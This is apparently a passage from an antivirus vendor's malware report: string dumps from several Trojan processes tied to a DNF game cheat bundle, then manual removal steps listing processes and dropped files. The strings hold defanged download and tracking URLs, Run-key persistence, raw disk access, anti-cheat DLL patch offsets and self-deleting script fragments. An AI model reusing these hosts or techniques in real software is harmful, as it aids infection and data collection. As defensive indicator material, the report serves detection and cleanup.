COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
user32.dll
RASAPI32.dll
GetWindowsDirectoryA
GetKeyState
GetViewportOrgEx
GDI32.dll
WINMM.dll
WINSPOOL.DRV
RegOpenKeyExA
COMCTL32.dll
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
RegCreateKeyExA
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
#include "l.chs\afxres.rc" // Standard components
%Program Files%\HC188.exe
\dnf.exe
\cscapi.dll
.vmp0
`.vmp1
.reloc
@.rsrc
ExitWindowsEx
msacm32.dll
acmDriverAddA
acmDriverAddW
acmDriverClose
acmDriverDetailsA
acmDriverDetailsW
acmDriverEnum
acmDriverID
acmDriverMessage
acmDriverOpen
acmDriverPriority
acmDriverRemove
tcj.dll
\\.\\physicaldrive0
\kernel32.dll
ntdll.dll
program internal error number is %d.
:"%s"
:"%s".
Pc<g.aDU
.naT7
8n%xgD
.Cb1t%v
m*m.kZcV0~,,
m.tCgLbO
"]@_0m.YT1~
t-f%u
O^5l%x)_p
,a.Epc)
.zKQ\XcCp
7~%dP_i
<M.ExL
^NcMdCN
f%uXt
%X_B_d*
.OBj[V
|%dj8g:Y4
.vKUn
t9ZG>q,k.kD
JKHY8k,q*o.Zk
/.hzz" 
%dGFa
yHXcRT]
{$q.cRYs
.aH`SVA
w*q(o.YT;d1
i2USER32.dll
o(.CV
o .CP
.eD]6
X3f_.ep>
u(o.eTa
URLg8[
<4,$?7/'
(3-!0,1'8"5.*2$
&&&&6666????
""""****
2222::::
$$$$\\\\
00006666
####====
CreateWindowStationA
EnumChildWindows
MsgWaitForMultipleObjects
cscapi.dll
SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion\CSDVersion
Windows 10
Windows 8.1
Windows Server 2012
Windows Server 2008 R2
Windows Server 2008
Windows Server 2003
Windows Server 2003 R2
Windows NT 4.0
Windows 95
Windows 98
Windows Me
Web Edition
SOFTWARE\Microsoft\Windows NT\CurrentVersion\EditionID
SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentBuild
VVV.ezdun.com
VVV.ezdun.com
\gcg.txt
NTDLL.DLL
CloseWindowStation
GetAsyncKeyState
1.1.3
;3 #>6.&
'2, / 0&7!4-)1#
5-5Z5m5u5}5
;%;-;1;7;
4E8:8&?
=2,3,4,5,6,7,8
!.qn%
X].XMgW
.dq?]
\start\DNFchina.exe
%d&&'
123456789
00003333
deflate 1.1.3 Copyright 1995-1998 Jean-loup Gailly
inflate 1.1.3 Copyright 1995-1998 Mark Adler
Broken pipe
Inappropriate I/O control operation
Operation not permitted
iphlpapi.dll
MPR.dll
VERSION.dll
RegCreateKeyA
(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|PNG
(*.PNG)|*.PNG|BMP
1.6.9
unsupported zlib version
png_read_image: unsupported transformation
libpng error: %s
libpng warning: %s
bad keyword
libpng does not support gamma background rgb_to_gray
Palette is NULL in indexed image
urllifdbFFF- ,DCD C
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity name="E.App" processorArchitecture="x86" version="5.2.0.0" type="win32"/><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency></assembly>
\wtsapi32.dll
DNF.exe
20:25:00
hXXp://dnf2020.cccpan.com
24266 //
3 //[1]-
64024 //
TerSafe.dll
TerSafe.dll 156228 10 100=c3
TerSafe.dll 156228 10 e0=c3
TerSafe.dll 156228 c 400=195
TerSafe.dll 156228 c 400=c3
TerSafe.dll 156228 c 400=85
TerSafe.dll 156228 10 100=80
WINMM.DLL
RegisterHotKey
UnregisterHotKey
TXPFProxy.dll
%d%d%d
rundll32.exe shell32.dll,
8#8.8]8~8
4_5
; ;$;(;9;
1%1S1g1:2A2H2O2
5%5X5w5
< =4=@=\=|=
?$?(?0?4?
; ;$;(;,;0;4;
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
Wp.Iw
A.zkt@
5p|%U
ù'p
\uap.ini
\ldyz.yz
ldyz.yz
C$%cmb
.ppM|
 aZ.mO
%-^
.hk;~
KERNEL32.DLL
MSIMG32.dll
MSVFW32.dll
SkinH_EL.dll
(ldyz.yz)
GetCommunicationPass
ReSetPassWord
Get_SysMessagemsgid
Get_SmsMessagemsgid
"!& 7/&)4)!"0A149;>>>%.DIC<H7=>;
d]%CX
E!T,.UUj
(%u}p
$.At@
VVV.dywt.com.cn
iSpeak.exe
EnumWindows
c:\%original file name%.exe
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
{8856F961-340A-11D0-A96B-00C04FD705A2}
1, 0, 0, 1
BrowserServer.EXE
(*.*)
!"#$%&'()* 
1.0.0.0
575071031
(hXXp://VVV.eyuyan.com)
1, 0, 6, 6
9.0.0.0

%original file name%.exe_2180_rwx_6A8C4000_0000B000:

.?AVCRexPortHandle@@
.?AUIRexPortHandle@@
.?AVCRexSocketMsg@@
.?AVCHttpParser@@
.?AVCHttpRexClient@@

HC188.exe_2748:

.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
iu2.iu
wininet.dll
ws2_32.dll
IPHLPAPI.DLL
oleaut32.dll
ole32.dll
OleAut32.dll
kernel32.dll
ShellExecuteA
HttpOpenRequestA
HttpSendRequestA
HttpQueryInfoA
mm.exe
@.reloc
operator
GetProcessWindowStation
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GET %s HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5
Host: %s
,5-%d
Range:bytes=0-%s
POST /?%d HTTP/1.1
Content-Length: %d
X-%c: %c
hXXp://
VVV.%s
Windows 8
Windows 7
Windows Vista
Windows 2003
Windows XP
Windows 2000
Windows NT
Windows 2008
%d * %dMHz
dnsapi.dll
KERNEL32.dll
Software\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
.temp.fortest
\WindowsUpdate
F:\Projects\7
\20150606\Server\Release\Server.pdb
WS2_32.dll
DNSAPI.dll
WinExec
GetProcessHeap
GetCPInfo
USER32.dll
RegOpenKeyA
RegCloseKey
ADVAPI32.dll
ShellExecuteExA
SHELL32.dll
SHLWAPI.dll
zcÁ
MFC42.DLL
MSVCRT.dll
_acmdln
OLEAUT32.dll
function confirm(str){return true;}function alert(str){return true;}window.history.back(-1);
CWebBrowser2
88.200jh.com
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
0 0$0(0,00040~0
;*;/;;;@;_;
2 2$2024282
hXXp://VVV.ip138.com/ips.asp?ip=
hXXp://VVV.ip138.com/ip2city.asp
tem.vbs
fso.DeleteFile("
Set fso = CreateObject("Scripting.FileSystemObject")
Wscript.Sleep(1000)
hXXp://183.60.200.160:8080/yy.txt
</url>
<url>
https
Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
http=
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
hXXps://
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
hXXp://VVV.900cpa.cc:8080/tongji.php?ver=hongchen&mac=
{4590f811-1d3a-11d0-891f-00aa004b2e24}
{dc12a687-737f-11cf-884d-00aa004b2e24}
\\.\PhysicalDrive0
F%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
__MSVCRT_HEAP_SELECT
user32.dll
RASAPI32.dll
GetWindowsDirectoryA
GetKeyState
GetViewportOrgEx
GDI32.dll
WINMM.dll
WINSPOOL.DRV
RegOpenKeyExA
COMCTL32.dll
InternetCrackUrlA
InternetCanonicalizeUrlA
WININET.dll
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
RegCreateKeyExA
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
HTTP/1.0
%s <%s>
Reply-To: %s
From: %s
To: %s
Subject: %s
Date: %s
Cc: %s
%a, %d %b %Y %H:%M:%S
SMTP
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
own.818wy.com:8089/hyaz2_y_10031.exe
Via: cache1.l2nu17[0,304-0,H], cache18.l2nu17[0,0], kunlun4.cn345[0,200-0,H], kunlun10.cn345[0,0]
X-Cache: HIT TCP_MEM_HIT dirn:10:903694853
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
location.href="hXXp://VVV.ip138.com/ips138.asp"   location.search;
<a href="hXXp://VVV.ip138.com/ips138.asp">IP
%Program Files%\HC188.exe
#include "l.chs\afxres.rc" // Standard components
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
{8856F961-340A-11D0-A96B-00C04FD705A2}
1, 0, 0, 1
BrowserServer.EXE
(*.*)

otqvyruekg.exe_3296:

.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
GET %s HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.4; en-US; rv:1.9b5) Gecko/2008032619 Firefox/3.0b5
Host: %s
,5-%d
Range:bytes=0-%s
POST /?%d HTTP/1.1
Content-Length: %d
X-%c: %c
hXXp://
VVV.%s
Windows 8
Windows 7
Windows Vista
Windows 2003
Windows XP
Windows 2000
Windows NT
Windows 2008
%d * %dMHz
dnsapi.dll
KERNEL32.dll
Software\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
.temp.fortest
\WindowsUpdate
F:\Projects\7
\20150606\Server\Release\Server.pdb
WS2_32.dll
IPHLPAPI.DLL
DNSAPI.dll
WinExec
GetProcessHeap
GetCPInfo
USER32.dll
RegOpenKeyA
RegCloseKey
ADVAPI32.dll
ShellExecuteExA
SHELL32.dll
SHLWAPI.dll
zcÁ
MFC42.DLL
MSVCRT.dll
_acmdln
ole32.dll
OLEAUT32.dll
function confirm(str){return true;}function alert(str){return true;}window.history.back(-1);
CWebBrowser2
88.200jh.com
C:\Windows\WindowsUpdate\otqvyruekg.exe
C:\Windows\WindowsUpdate
otqvyruekg.exe
vqbvtgijv.exe
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><application xmlns="urn:schemas-microsoft-com:asm.v3"><windowsSettings><dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware></windowsSettings></application></assembly>
0 0$0(0,00040~0
;*;/;;;@;_;
2 2$2024282
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
kernel32.dll
USER32.DLL
{8856F961-340A-11D0-A96B-00C04FD705A2}
1, 0, 0, 1
BrowserServer.EXE

mmc.exe_3368:

.text
`.rdata
@.data
.rsrc
t$(SSh
~%UVW
u$SShe
iu2.iu
kernel32.dll
user32.dll
ntdll.dll
psapi.dll
shell32.dll
advapi32.dll
ShellExecuteA
RegCloseKey
RegCreateKeyA
RegOpenKeyA
%WinDir%\Media\McIe.wav
%WinDir%\Media\Mcfg.wav
%WinDir%\syswow64\dllhost.exe
%WinDir%\st.dat
%WinDir%\star.dat
%WinDir%\Media\
as.bat
explorer.exe
winlogon.exe
360tray.exe
minibaidu.exe
@Dqc.exe
MIJ.exe
27e.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
%*.*f
CNotSupportedException
commctrl_DragListMsg
Afx:%x:%x:%x:%x:%x
Afx:%x:%x
COMCTL32.DLL
CCmdTarget
ole32.dll
__MSVCRT_HEAP_SELECT
GetProcessHeap
WinExec
GetWindowsDirectoryA
KERNEL32.dll
GetKeyState
USER32.dll
GetViewportOrgEx
GDI32.dll
WINMM.dll
WINSPOOL.DRV
RegOpenKeyExA
ADVAPI32.dll
SHELL32.dll
OLEAUT32.dll
COMCTL32.dll
oledlg.dll
WS2_32.dll
GetCPInfo
CreateDialogIndirectParamA
UnhookWindowsHookEx
SetWindowsHookExA
SetViewportOrgEx
OffsetViewportOrgEx
SetViewportExtEx
ScaleViewportExtEx
GetViewportExtEx
comdlg32.dll
RegCreateKeyExA
.PAVCException@@
.PAVCNotSupportedException@@
.PAVCFileException@@
(*.prn)|*.prn|
(*.*)|*.*||
Shell32.dll
Mpr.dll
Advapi32.dll
User32.dll
Gdi32.dll
Kernel32.dll
(&07-034/)7 '
?? / %d]
%d / %d]
: %d]
(*.WAV;*.MID)|*.WAV;*.MID|WAV
(*.WAV)|*.WAV|MIDI
(*.MID)|*.MID|
(*.txt)|*.txt|
(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPG
(*.JPG)|*.JPG|BMP
(*.BMP)|*.BMP|GIF
(*.GIF)|*.GIF|
(*.ICO)|*.ICO|
(*.CUR)|*.CUR|
%s:%d
windows
out.prn
%d.%d
%d / %d
%d/%d
Bogus message code %d
(%d-%d):
%ld%c
1.1.3
;3 #>6.&
'2, / 0&7!4-)1#
(*.htm;*.html)|*.htm;*.html
.PAVCOleException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCMemoryException@@
.?AVCNotSupportedException@@
.PAVCResourceException@@
.PAVCUserException@@
.?AVCCmdTarget@@
.?AVCCmdUI@@
.?AVCTestCmdUI@@
.PAVCArchiveException@@
.PAVCOleDispatchException@@
zcÁ
92df787bea434c33.exe
C:\Windows\system32\mmc.exe
#include "l.chs\afxres.rc" // Standard components
2"&,\45>
*.**)
.uy}"
(*.*)

jyueservice.exe_3004:

.text
`.rdata
@.data
.rsrc
@.reloc
SPSSSSSSh
hu2.iu
0123456789abcdef\\.\PhysicalDrive%d
ERROR: Could not open IDE21201.VXD file
\\.\IDE21201.VXD
\\.\Scsi%d:
XXXXXX
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
GetProcessWindowStation
operator
%s.log
OpenSCManager failed, error code = %d
Failed to create service %s, error code = %d
Service %s installed
OpenService failed, error code = %d
Failed to delete service %s
Service %s removed
d/d/d, d:d:d
ControlService failed, error code = %d
StartService failed, error code = %d
StartServiceCtrlDispatcher failed, error code = %d
RegisterServiceCtrlHandler failed, error code = %d
SetServiceStatus failed, error code = %d
B5MUpdate.exe
Unrecognized opcode %d
"%s" %s
Start process SUCCEEDED: '%s'
Failed to start program '%s', error code = %d
RIBridage.exe
WTSAPI32.dll
USERENV.dll
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExW
ADVAPI32.dll
ole32.dll
OLEAUT32.dll
WinHttpReceiveResponse
WinHttpSetTimeouts
WinHttpSetOption
WinHttpGetIEProxyConfigForCurrentUser
WinHttpSendRequest
WinHttpWriteData
WinHttpConnect
WinHttpCloseHandle
WinHttpQueryHeaders
WinHttpQueryDataAvailable
WinHttpOpen
WinHttpOpenRequest
WinHttpGetProxyForUrl
WinHttpCrackUrl
WinHttpReadData
WinHttpAddRequestHeaders
WINHTTP.dll
SHLWAPI.dll
IPHLPAPI.DLL
GetCPInfo
PeekNamedPipe
GetProcessHeap
zcÁ
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jyueservice.exe
C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jyueservice.log
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
2024282<2
7%8X8g8p8
? ?$?(?,?
> >$>(>,>0>4>8><>@>
6 6(60646
succ %s line:%d, error:%d
LX
#{ad498944-762f-11d0-8dcb-00c04fc3358c}
nKERNEL32.DLL
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
WinHttpClient
hXXp://
VVV.jyrili.com
DownLoadUrl new WinHttpClient failed!
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB7.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
DownLoadUrl SendHttpRequest failed and request Url is:
DownLoadUrl download failed!
DownLoadUrl write file failed and file is:
DownLoadUrl open file failed and file is:
"url":
/client.do/?method=svcupdate&version=
4.0.3.0
\svcupdate.exe
RLServic.exe


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    HC188.exe:2748
    WScript.exe:2632
    src2011.tmp:372
    src2011.exe:3732
    bFuAq.exe:3352
    1819.exe:3564
    rundll32.exe:3404
    mm.exe:2712
    regsvr32.exe:2260
    mmc.exe:3368
    guide.exe:2532
    guide.exe:672
    otqvyruekg.exe:3296

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Windows\1819.exe (50 bytes)
    C:\Windows\mm.exe (299 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\hyaz2_Y_10031[1].exe (28065 bytes)
    C:\Windows\src2011.exe (50 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4ZZNMJGQ\src2011[1].exe (565882 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\25FDO7QC\yy[1].txt (301 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JYNOWECL\1819[1].exe (527707 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-B9OOF.tmp (1281 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-MF5A3.tmp (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\xmlconfig\is-RP6UK.tmp (663 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\is-19N56.tmp (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-460JK.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-FVIO4.tmp (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-2MIAD.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\DirectUI\is-IADDD.tmp (594 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\zh_CN\is-NICJE.tmp (816 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-HVUIH.tmp (2105 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-T9LKT.tmp (3073 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-3KJB6.tmp (5 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-J5JMM.tmp (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-CAITJ.tmp (13800 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-G6L66.tmp (2321 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\DirectUI\is-2VABS.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-B8MLT.tmp (4185 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\is-065I6.tmp (57 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-A0FE6.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-9S1N0.tmp (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J759K.tmp\ISTask.dll (687 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\chromeNativeClient\is-G7L8O.tmp (2105 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-IK8SG.tmp (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-7F8IN.tmp (3361 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-PBIU3.tmp (2321 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-LF318.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\is-8PHSQ.tmp (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\DirectUI\is-5ICHK.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\is-20378.tmp (56 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-LUS01.tmp (601 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\is-CTN93.tmp (3361 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-RPA16.tmp (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-UL91T.tmp (520 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\RLDataView.d (438 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-T50I1.tmp (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-BHK2S.tmp (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-J759K.tmp\_isetup\_shfoldr.dll (47 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-4EB2H.tmp (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-7ON68.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-PEBLC.tmp (3 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\res\is-0PTE5.tmp (88 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\chromeNativeClient\is-SM9S4.tmp (412 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\is-RVOIL.tmp (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-8NQQU.tmp (601 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-SMSJL.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-ULD5Q.tmp (230 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-L3U6R.tmp (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_locales\en\is-4Q56G.tmp (294 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-9FV32.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-7LBB8.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-SIFLR.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-6SUBS.tmp (18 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-9G0BA.tmp (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-R6SC4.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\chrome\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\_metadata\is-9T08E.tmp (40 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\resource\is-UBRU8.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\xmlconfig\is-EPA69.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\is-K9B92.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\extensions\int2\hohonaplgfolmdaaafoddgbiakognoal\4.0.2_0\is-C1SG6.tmp (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\381578\jyueservice.exe (208 bytes)
